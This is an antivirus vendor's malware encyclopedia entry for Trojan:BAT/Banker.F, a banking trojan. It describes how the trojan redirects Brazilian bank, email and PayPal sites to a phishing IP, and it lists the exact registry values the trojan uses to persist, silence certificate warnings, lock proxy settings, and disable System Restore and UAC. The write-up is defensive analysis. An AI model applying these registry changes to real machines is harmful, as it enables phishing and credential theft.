Home / malware Trojan:BAT/Banker.F
First posted on 03 August 2012.
Source: MicrosoftAliases :
Trojan:BAT/Banker.F is also known as TR/Banker.F.1 (Avira), Trojan.Banker!WBNp3+aokMk (VirusBuster), Trojan-Banker.BAT.Banker.k (Kaspersky), TSPY_BANKER.JWE (Trend Micro), W32/Banker2.QG (Command).
Explanation :
Trojan:BAT/Banker.F is a trojan that redirects your web browser so that when you attempt to access certain websites you are redirected to malicious sites that attempt to steal or "phish" your information.
To accomplish this, Trojan:BAT/Banker.F modifies system and browser settings that may leave your computer unsecured.
Installation
When executed, Trojan:BAT/Banker.F copies itself as "AxUpdateMS.exe" into the %TEMP% folder.
It also drops a TXT (plain text) file, "KB_<computer name>_.txt", into the %TEMP% folder. This TXT file contains configuration settings for Internet Explorer that enable the malware's website-redirection payload.
Note: %TEMP% refers to a variable location that is determined by the malware by querying the operating system. The default installation location for the Temporary Files folder for Windows 2000, XP, and 2003 is "C:\DOCUME~1\<user>\LOCALS~1\Temp". For Windows Vista and 7, the default location is "C:\Users\<user name>\AppData\Local\Temp".
The malware creates the following registry entry so that it can automatically run at each Windows start:
In subkey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Sets value: "ActiveX Update"
With data: "%TEMP%\AxUpdateMS.exe"
Payload
Redirects websites
Trojan:BAT/Banker.F may redirect the following safe websites to "200.98.132.144" for phishing and/or information-stealing activities:
- americanexpress.com.br
- americanexpress.com
- bancoamazonia.com.br
- bancobrasil.com.br
- bancodobrasil.com.br
- banese.com.br
- banespa.com.br
- bb.b.br
- bb.com.br
- bradesco.b.br
- bradesco.com.br
- bradescopessoajuridica.b.br
- bradescopessoajuridica.com.br
- bradescoprime.com.br
- citibank.com.br
- gmail.com.br
- gmail.com
- hotmail.com.br
- hotmail.com
- hsbc.com.br
- itau.b.br
- itau.com.br
- itaupersonnalite.com.br
- paypal.com.br
- paypal.com
- safranet.com.br
- safraprivate.com.br
- santander.com.br
- santanderempresarial.com.br
- serasa.com.br
- serasaexperian.com.br
Modifies browser settings
Trojan:BAT/Banker.F modifies browser settings that assist it in its malicious activity by making a number of registry modifications.
It disables the notification of errors for poor or unsecured website security certificates, possibly to prevent warnings from appearing when you are redirected to malicious pages:
In subkey: HKU\<local_SID>\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Sets value: "WarnonBadCertRecving"
With data: "0"
Note: <local_SID> is a variable that refers to your "security identifier", which is a unique alphanumeric code that your computer uses to identify you, similar to your user name.
It allows the attacker to define their own rules for what is considered an intranet-zone website - which have a less-secure level of settings than websites on the Internet:
In subkey: HKU\<local_SID>\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Sets value: "AutoDetect"
With data: "0"
It disables notifications that you are visiting intranet-zone websites:
In subkey: HKU\<local_SID>\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Sets value: "WarnOnIntranet"
With data: "0"
It disables the ability to restore your home page and search sites to their defaults:
In subkey: HKCU\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel
Sets value: "ResetWebSettings"
With data: "1"
In subkey: HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel
Sets value: "ResetWebSettings"
With data: "1"
It hides the Connections tab in the Internet Explorer options window and forces Internet Explorer to use configuration settings provided in a file:
In subkey: HKCU\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel
Sets value: "Autoconfig"
With data: "1"
In subkey: HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel
Sets value: "Autoconfig"
With data: "1"
It provides and loads a file that may contain configuration settings for Internet Explorer:
In subkey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
Sets value: "AutoConfigUrl"
With data: "%TEMP%\KB_<computer name>_.txt"
In subkey: HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel
Sets value: "AutoConfigUrl"
With data: "%TEMP%\KB_<computer name>_.txt"
It ensures that Internet Explorer uses the HTTP 1.1 standard, possibly to ensure sites that you are redirected to are displayed properly on your computer:
In subkey: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
Sets value: "EnableHttp1_1"
With data: "1"
In subkey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
Sets value: "EnableHttp1_1"
With data: "1"
It disables the option to specify your own proxy for connecting to websites via a LAN (local area network), and ensures that it uses the HTTP 1.1 standard for proxy connections:
In subkey: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
Sets value: "ProxyEnable"
With data: "0"
In subkey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
Sets value: "ProxyEnable"
With data: "0"
In subkey: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
Sets value: "ProxyHttp1.1"
With data: "0"
In subkey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
Sets value: "ProxyHttp1.1"
With data: "0"
It hides the Advanced tab in the Internet Explorer options window:
In subkey: HKCU\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel
Sets value: "AdvancedTab"
With data: "1"
In subkey: HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel
Sets value: "AdvancedTab"
With data: "1"
Modifies system settings
Trojan:BAT/Banker.F also modifies system settings to prevent system restore, so that you cannot revert to a previous, uninfected state of Windows, by modifying the following registry entry:
In subkey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore
Sets value: "DisableSR"
With data: "1"
Trojan:BAT/Banker.F disables the LUA (Least Privileged User Account), also known as the "administrator in Admin Approval Mode" user type, by making the following registry modification:
In subkey: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Sets value: "EnableLUA"
With data: "0"
Note: Disabling the LUA allows all applications to run by default with all administrative privileges, without prompting you for explicit consent.
Analysis by Edgardo Diaz
Last update 03 August 2012